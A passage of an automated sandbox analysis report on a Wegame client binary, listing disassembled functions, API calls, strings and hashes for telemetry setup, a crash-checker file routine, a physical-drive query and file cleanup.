                                                                control_flow_graph 872 464492-4644a3 873 4644a7-4644f6 ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ ?set_qos_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXK@Z ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ call 46a091 ?set_ver@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABUversion_t@common@4@@Z ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ ?get_machine_id@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ ?set_machine_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z call 420c80 872->873 876 4644fb-464567 ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ call 420e50 ?set_qm_report_guid@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z call 420c80 ?set_machine_guid_async@Application@common@ierd_tgp@@SAXXZ ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ ?get_session_id@Application@common@ierd_tgp@@QAE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ ?set_session_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z call 420c80 873->876 882 46456c-4645cc ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ ?get_client_id@util_client_info@ierd_tgp@@YAHXZ ?set_client_version_type@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXH@Z ?GetLastLoginedUin@common@ierd_tgp@@YA_KXZ call 454452 ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ ?set_uid@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z ?GetLastLoginedWegameId@common@ierd_tgp@@YAIXZ ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ call 46bff0 876->882 886 4645d1-464615 ?set_account_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z call 420c80 call 420e50 882->886 890 46461a-464622 call 453fd5 886->890 892 464627-464657 call 420e50 890->892 894 46465c-464664 call 453fd5 892->894 896 464669-464675 894->896 897 464677-4646d8 ?get_exe_path_ex@Application@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ call 46c98b call 45db69 call 40bbd0 * 3 896->897 898 4646dd-464731 ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ ?set_channel_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABH@Z ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ ?set_bind_game_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXAB_K@Z call 420e50 896->898 897->898 902 464736-464789 ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PAH@Z call 420c80 ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ ?SetStartForID@Qos@qos@adapt_for_imports@ierd_tgp@@QAEX_K@Z call 420c80 call 45b9bc call 46e431 898->902
                                                                APIs
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON ref: 004644A7
                                                                • ?set_qos_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXK@Z.COMMON(00000B57), ref: 004644AF
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(00000B57), ref: 004644B4
                                                                • ?set_ver@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABUversion_t@common@4@@Z.COMMON(00000000), ref: 004644CE
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(00000000), ref: 004644D3
                                                                • ?get_machine_id@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,00000000), ref: 004644DE
                                                                • ?set_machine_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(00000000,00000000), ref: 004644EB
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(00000000,00000000), ref: 004644FB
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420E77
                                                                • ?set_qm_report_guid@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 0046452E
                                                                  • Part of subcall function 00420C80: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0043E0C9,85A35C35,?,?,?,00474220,000000FF,?,0043E01E,85A35C35,?,?,?,004741CF,000000FF), ref: 00420CC5
                                                                • ?set_machine_guid_async@Application@common@ierd_tgp@@SAXXZ.COMMON(?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 0046453E
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 00464543
                                                                • ?get_session_id@Application@common@ierd_tgp@@QAE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 00464550
                                                                • ?set_session_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(00000000,?,?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 0046455C
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(00000000,?,?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 0046456C
                                                                • ?get_client_id@util_client_info@ierd_tgp@@YAHXZ.COMMON(00000000,?,?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 00464573
                                                                • ?set_client_version_type@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXH@Z.COMMON(00000000,00000000,?,?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 0046457B
                                                                • ?GetLastLoginedUin@common@ierd_tgp@@YA_KXZ.COMMON(00000000,00000000,?,?,00480FF8,00000002,?,?,?,?,?,000000EC,00459F4F), ref: 00464580
                                                                  • Part of subcall function 00454452: __EH_prolog3_GS.LIBCMT ref: 00454459
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON ref: 004645A9
                                                                • ?set_uid@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(?), ref: 004645B4
                                                                • ?GetLastLoginedWegameId@common@ierd_tgp@@YAIXZ.COMMON(?), ref: 004645B9
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(?), ref: 004645C0
                                                                  • Part of subcall function 0046BFF0: __EH_prolog3.LIBCMT ref: 0046BFF7
                                                                • ?set_account_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(00000000,?), ref: 004645DA
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420F1B
                                                                  • Part of subcall function 00453FD5: __EH_prolog3_GS.LIBCMT ref: 00453FDC
                                                                  • Part of subcall function 00453FD5: ?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N@Z.COMMON(?,00000008,00000000,0000006C,00000000,bool __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_,e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp,000002A0,?,00000008,00000000,int __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_s,e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp,000002A0), ref: 00453FFB
                                                                  • Part of subcall function 00453FD5: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(bool __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_,e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp,000002A0,?,00000008,00000000,int __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_s,e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp,000002A0), ref: 00454007
                                                                  • Part of subcall function 00420E50: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00420F68
                                                                • ?get_exe_path_ex@Application@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?), ref: 0046467E
                                                                • ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?), ref: 0046468E
                                                                  • Part of subcall function 0046C98B: __EH_prolog3.LIBCMT ref: 0046C992
                                                                  • Part of subcall function 0045DB69: __EH_prolog3_GS.LIBCMT ref: 0045DB70
                                                                  • Part of subcall function 0045DB69: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000050,004646AC,00000000,?,?), ref: 0045DBA0
                                                                  • Part of subcall function 0040BBD0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0040E902,?,?), ref: 0040BC1D
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(?,?), ref: 004646DD
                                                                • ?set_channel_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXABH@Z.COMMON(00000000), ref: 004646EB
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(00000000), ref: 004646F0
                                                                • ?set_bind_game_id@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXAB_K@Z.COMMON(?,00000000), ref: 0046470D
                                                                • ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PAH@Z.COMMON(?,?,StartFor,00000008,?,00000000), ref: 00464745
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(StartFor,00000008,?,00000000), ref: 00464758
                                                                • ?SetStartForID@Qos@qos@adapt_for_imports@ierd_tgp@@QAEX_K@Z.COMMON(?,?,StartFor,00000008,?,00000000), ref: 00464768
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@D@std@@Qos@123@Qos@qos@adapt_for_imports@ierd_tgp@@U?$char_traits@V?$allocator@V?$basic_string@$D@2@@std@@D@2@@std@@@$Application@common@ierd_tgp@@$H_prolog3__invalid_parameter_noinfo_noreturn$?get_log_instance@base@@H_prolog3LastLogger@1@Loginedmemmove$?extract_op_from_cmd@?get_cfg_by_path@common@ierd_tgp@@?get_client_id@util_client_info@ierd_tgp@@?get_exe_path_ex@?get_machine_id@?get_session_id@?parent_path@path@filesystem@ierd_tgp@@?set_account_id@?set_bind_game_id@?set_channel_id@?set_client_version_type@?set_machine_guid_async@?set_machine_id@?set_qm_report_guid@?set_qos_id@?set_session_id@?set_uid@?set_ver@D@2@@std@@@2@@property_tree@boost@@_Id@common@ierd_tgp@@StartSys_wrapper@common@ierd_tgp@@U?$less@Uin@common@ierd_tgp@@Uversion_t@common@4@@V123@V12@V?$basic_ptree@Vpath@filesystem@3@Wegame
                                                                • String ID: StartFor$initial.bind_by_game.channel_id$initial.bind_by_game.game_id
                                                                • API String ID: 767771055-1011178086
                                                                • Opcode ID: e11e7ac010909cbea9d3ef15fe5bf74d7624d6ca27fa02566f80c5a518846e0a
                                                                • Instruction ID: 83c608d1e361e4d1b910f0c236b3c569512478354f034213938e171b2ecb13bd
                                                                • Opcode Fuzzy Hash: e11e7ac010909cbea9d3ef15fe5bf74d7624d6ca27fa02566f80c5a518846e0a
                                                                • Instruction Fuzzy Hash: 37918671D00258DACB14FBBAC8557DDBBF46F14308F14849FE009B7282EB794B498B6A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0043E902 Relevance: 58.1, APIs: 23, Strings: 10, Instructions: 376filetimeCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 919 43e902-43e922 call 46e476 922 43e926-43e931 PathFileExistsW 919->922 923 43e924 919->923 924 43e937-43e95f ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z 922->924 925 43ea5b-43ea8d call 40f180 PathFileExistsW 922->925 923->922 927 43e963-43e972 SHCreateDirectoryExW 924->927 928 43e961 924->928 932 43eaa2-43eaae 925->932 933 43ea8f-43eaa0 925->933 930 43e9e4-43e9ed ?get_log_instance@base@@YAPAVILogger@1@XZ 927->930 931 43e974-43e97a 927->931 928->927 934 43ea47-43ea59 call 420c80 930->934 935 43e9ef-43e9fc 930->935 931->930 936 43e97c-43e985 ?get_log_instance@base@@YAPAVILogger@1@XZ 931->936 939 43eab0-43eac4 CreateFileW 932->939 933->939 934->925 935->934 947 43e9fe-43ea35 call 43df1b call 43f4bb 935->947 936->934 937 43e98b-43e998 936->937 937->934 951 43e99e-43e9e2 call 43df1b GetLastError call 43f4bb 937->951 942 43eb33-43eb45 memset 939->942 943 43eac6-43eacf ?get_log_instance@base@@YAPAVILogger@1@XZ 939->943 945 43eb4b-43eb6a ReadFile 942->945 946 43ec1e-43ec27 ?get_log_instance@base@@YAPAVILogger@1@XZ 942->946 948 43ead5-43eae2 943->948 949 43ed8e-43ed9f call 40bbd0 call 46e420 943->949 952 43ebbe-43ebc7 ?get_log_instance@base@@YAPAVILogger@1@XZ 945->952 953 43eb6c-43eb75 ?get_log_instance@base@@YAPAVILogger@1@XZ 945->953 955 43ec9a-43ec9f 946->955 956 43ec29-43ec36 946->956 983 43ea38-43ea42 call 43e231 947->983 948->949 966 43eae8-43eb2e call 43df1b GetLastError call 43f4bb call 43e231 948->966 951->983 952->946 958 43ebc9-43ebd6 952->958 953->946 962 43eb7b-43eb88 953->962 960 43eca1-43eca3 call 43eda0 955->960 961 43eca8-43ecd1 GetLocalTime WriteFile 955->961 956->955 974 43ec38-43ec95 call 43df1b call 43f4bb call 43e231 956->974 958->946 986 43ebd8-43ec0c call 43df1b GetLastError call 43f4bb 958->986 960->961 970 43ecd3-43ecdc ?get_log_instance@base@@YAPAVILogger@1@XZ 961->970 971 43ed25-43ed2e ?get_log_instance@base@@YAPAVILogger@1@XZ 961->971 962->946 988 43eb8e-43ebbc call 43df1b call 43f4bb 962->988 966->949 979 43ed87-43ed88 CloseHandle 970->979 981 43ece2-43ecee 970->981 978 43ed30-43ed3d 971->978 971->979 974->955 978->979 999 43ed3f-43ed75 call 43df1b GetLastError call 43f4bb 978->999 979->949 981->979 1000 43ecf4-43ed23 call 43df1b call 43f4bb 981->1000 983->934 1015 43ec0f-43ec19 call 43e231 986->1015 988->1015 1020 43ed78-43ed82 call 43e231 999->1020 1000->1020 1015->946 1020->979
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0043E90C
                                                                • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000098), ref: 0043E927
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000098), ref: 0043E952
                                                                • SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 0043E968
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,00000098), ref: 0043E97C
                                                                • GetLastError.KERNEL32(00000000,00000005,e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\crashchecker.cpp,00000048,0048BBC7), ref: 0043E9BE
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,00000098), ref: 0043E9E4
                                                                • PathFileExistsW.SHLWAPI(?), ref: 0043EA82
                                                                • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,00000000,00000000), ref: 0043EAB9
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000098), ref: 0043EAC6
                                                                • GetLastError.KERNEL32(00000000,00000005,e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\crashchecker.cpp,0000005E,0048BBC7), ref: 0043EB08
                                                                • memset.VCRUNTIME140(?,00000000,00000010), ref: 0043EB3B
                                                                • ReadFile.KERNEL32(00000000,?,00000010,00000000,00000000), ref: 0043EB62
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0043EB6C
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0043EBBE
                                                                • GetLastError.KERNEL32(00000000,00000005,e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\crashchecker.cpp,0000006A,0048BBC7), ref: 0043EBF8
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0043EC1E
                                                                • WriteFile.KERNEL32(00000000,00000000,00000010,?,00000000,?,?,?,?,?,?,?,?,00000098), ref: 0043ECC9
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,00000098), ref: 0043ECD3
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,00000098), ref: 0043ED25
                                                                • GetLocalTime.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000098), ref: 0043ECAC
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                  • Part of subcall function 0043F4BB: __EH_prolog3_catch_GS.LIBCMT ref: 0043F4C2
                                                                • GetLastError.KERNEL32(00000000,00000005,e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\crashchecker.cpp,00000082,0048BBC7,?,?,?,?,?,?,?,?,00000098), ref: 0043ED62
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000098), ref: 0043ED88
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@Logger@1@$File$ErrorLast$CreateExistsPath$?u16to8@common@ierd_tgp@@CloseD@2@@4@@D@std@@DirectoryH_prolog3H_prolog3_H_prolog3_catch_HandleLocalReadTimeU?$char_traits@U?$char_traits@_V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_W@2@@std@@W@std@@Writememset
                                                                • String ID: Create cache dir(%s) failed, last_err=%d-%d$Create cache path success: %s.$Create new file fail: %d.$Flag$Last time: %.4d-%.2d-%.2d %.2d:%.2d:%.2d %.3d$Read last config success.$Read last time config fail: %d.$Write file failed: %d.$Write file success.$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\crashchecker.cpp
                                                                • API String ID: 1197986196-255517738
                                                                • Opcode ID: 960e3472e78fe95b3e3fe20fc1dd2878ae6317e47e3909f1ea8733977fe85653
                                                                • Instruction ID: d8ae56c32770d86ccc14e61a70e492bcf096f15184521587d6ae014e6521360a
                                                                • Opcode Fuzzy Hash: 960e3472e78fe95b3e3fe20fc1dd2878ae6317e47e3909f1ea8733977fe85653
                                                                • Instruction Fuzzy Hash: E2D1E470E01214ABEB11EB65CC56FEE7378AF18704F20405AF5457B2C2DBB85E45CBA9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD8477F Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 204fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD84789
                                                                • memset.VCRUNTIME140(?,00000000,00000100,00000C68,6BD840C2,?,00000010,?), ref: 6BD847C3
                                                                • __snprintf_s.LIBCMT ref: 6BD847DC
                                                                • CreateFileA.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000C68,6BD840C2,?,00000010,?), ref: 6BD847F5
                                                                • memset.VCRUNTIME140(?,00000000,0000000C), ref: 6BD84818
                                                                • memset.VCRUNTIME140(?,00000000,00000800,?,00000000,0000000C), ref: 6BD84838
                                                                • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000800,?,00000000), ref: 6BD84864
                                                                • memset.VCRUNTIME140(?,00000000,00000100,?,?,?,?,?,?,?,?,?,00000C68,6BD840C2,?,00000010), ref: 6BD84880
                                                                • memset.VCRUNTIME140(?,00000000,00000100,?,00000000,00000100,?,?,?,?,?,?,?,?,?,00000C68), ref: 6BD84893
                                                                • memset.VCRUNTIME140(?,00000000,00000100,?,00000000,00000100,?,00000000,00000100), ref: 6BD848A6
                                                                • isalnum.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,?), ref: 6BD84907
                                                                • isalnum.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BD8491C
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000C68,6BD840C2,?,00000010,?), ref: 6BD84A7A
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000C68,6BD840C2,?,00000010,?), ref: 6BD84A81
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset$isalnum$CloseControlCreateDeviceErrorFileH_prolog3_HandleLast__snprintf_s
                                                                • String ID: \\.\PhysicalDrive%d
                                                                • API String ID: 2535720194-2935326385
                                                                • Opcode ID: 6d346f42a3327966239afc539222e92835072964f6fb7852943f012c9e1f0277
                                                                • Instruction ID: d9d818ed5ae3e2dcf5e4ad0197ae648da7db8457e39cfa144c1c38b8b34745cd
                                                                • Opcode Fuzzy Hash: 6d346f42a3327966239afc539222e92835072964f6fb7852943f012c9e1f0277
                                                                • Instruction Fuzzy Hash: C7818CB1C0022DAAEB25DF74CC85FE9B77CAB05314F1046DAA518AB180EB759BC5CF20
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00463A3A Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 122fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00463A44
                                                                • memset.VCRUNTIME140(?,00000000,00000208,000008D0,00464E9E,00000070,0045A152), ref: 00463A59
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00463A6F
                                                                • ?filename@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?), ref: 00463A9B
                                                                  • Part of subcall function 0046C98B: __EH_prolog3.LIBCMT ref: 0046C992
                                                                • ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,?,?), ref: 00463ACE
                                                                  • Part of subcall function 0040BBD0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0040E902,?,?), ref: 0040BC1D
                                                                • memset.VCRUNTIME140(?,00000000,00000208,?,?,?,?,?), ref: 00463AFD
                                                                • FindFirstFileW.KERNEL32(?,?,?,00000000,00000208,?,?,?,?,?), ref: 00463B52
                                                                • memset.VCRUNTIME140(?,00000000,0000020A), ref: 00463B86
                                                                • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000104,?,00000104,?,00000000,0000020A), ref: 00463B9B
                                                                • wcsncat_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000104,00481998,00000103), ref: 00463BAF
                                                                • DeleteFileW.KERNEL32(?), ref: 00463BC5
                                                                • MoveFileW.KERNEL32(?,?), ref: 00463BD5
                                                                • DeleteFileW.KERNEL32(?), ref: 00463BE2
                                                                • FindClose.KERNEL32(00000000), ref: 00463BE5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
